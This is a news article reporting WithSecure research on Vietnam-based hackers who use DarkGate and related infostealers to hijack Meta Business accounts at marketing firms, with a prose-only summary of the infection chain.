Digital marketing firms in India, the US and the UK are having a hard time dealing with Vietnam-based hackers, and are facing malware attacks.

Marketing Firms in India, US, and UK Being Targeted by Hackers

Adarsh V.KOctober 22, 23 cybersecurity, hacking

Cybercriminal groups based in Vietnam are targeting digital marketing companies based in India, the US and the UK by hijacking corporate Facebook accounts in a malicious campaign, a new report has found.

According to cybersecurity company WithSecure, the popular malware “Darkgate” has been bundled with a Malware as a Service (MaaS) toolkit to infect victims with competing Remote Access Trojans (RATs) and additional data-stealing malware such as Ducktail, Lobshot, and Redline. .

Researchers detected multiple infection attempts with the DarkGate malware targeting these countries on August 4.

The decoy documents, target templates, themes, delivery methods and general attack tactics are similar to recent DuckTail infostealer campaigns, according to the report.

DarkGate is a Remote Access Trojan (RAT) that first appeared in cyberspace in 2018. It is usually offered to cybercriminals as a Malware-as-a-Service tool.

Researchers examined open-source data related to the DarkGate malware campaign and found links to multiple repositories. This pattern indicates that these attacks are carried out by the same group or threat actor.

“By identifying the characteristics of the DarkGate malware decoys and campaigns, we have been able to identify several pivot points that lead to other data stealers and malware being used in very similar, if not identical, campaigns, and it is estimated that these campaigns are likely to be carried out by the same group of threat actors,” the researchers said.

According to the report, the attack started from a file named Salary and new products.8.4.zip. When unknowing users downloaded and unzipped it, the VBS script was activated.

This script renamed and cloned the original Windows binary (Curl.exe) to a new location before connecting to the external server to retrieve two additional files: autoit3.exe and the compiled Autoit3 script.

The script then ran the executable, de-obfuscated, and assembled the DarkGate RAT using the script strings.

“Based on our findings, it is highly likely that a single actor is behind several of the campaigns we are monitoring targeting Meta Business accounts,” said Stephen Robinson, senior threat intelligence analyst.

After gaining control of an account, attackers can engage in a variety of malicious activities, including malware distribution and fraud, the report warns.